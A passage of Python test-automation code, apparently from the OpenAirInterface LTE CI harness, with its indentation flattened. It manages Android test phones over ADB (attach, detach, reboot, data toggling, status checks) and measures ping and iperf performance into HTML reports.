p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
return
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
cnt = 0
while cnt < len(self.UEDevices):
if self.UEDevicesStatus[cnt] == UE_STATUS_ATTACHING:
self.UEDevicesStatus[cnt] = UE_STATUS_ATTACHED
cnt += 1
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHED
cnt += 1
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data disable', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data enable', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
if len(self.UEDevicesStatus) == 0:
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
cnt += 1
self.close()
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry', '\$', 15)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', str(self.ssh.before))
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', str(self.ssh.before))
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', str(self.ssh.before))
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckStatusUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
lock = Lock()
status_queue = SimpleQueue()
for device_id in self.UEDevices:
p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
self.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', str(self.ssh.before))
passStatus = True
if result is not None:
nb_ues = int(result.group('nb_ues'))
htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
if self.expectedNbOfConnectedUEs > -1:
if nb_ues != self.expectedNbOfConnectedUEs:
passStatus = False
else:
htmlOptions = 'N/A'
self.close()
else:
passStatus = True
htmlOptions = 'N/A'
if (status_queue.empty()):
self.CreateHtmlTestRow(htmlOptions, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
check_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
check_status = False
device_id = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
html_queue.put(html_cell)
if check_status and passStatus:
self.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', str(self.ssh.before))
if result is not None:
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
self.close()
return ue_ip_status
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ip addr show | grep rmnet', '\$', 15)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
self.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def PingNoS1_wrong_exit(self, qMsg):
html_queue = SimpleQueue()
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
def PingNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
if ping_from_eNB is not None:
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
else:
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
try:
if ping_from_eNB is not None:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
else:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
self.close()
html_queue = SimpleQueue()
ip_addr = 'TBD'
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
if packetLossOK:
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
# copying on the EPC server for logCollection
if ping_from_eNB is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
else:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'ping_' + self.testCase_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.PingNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
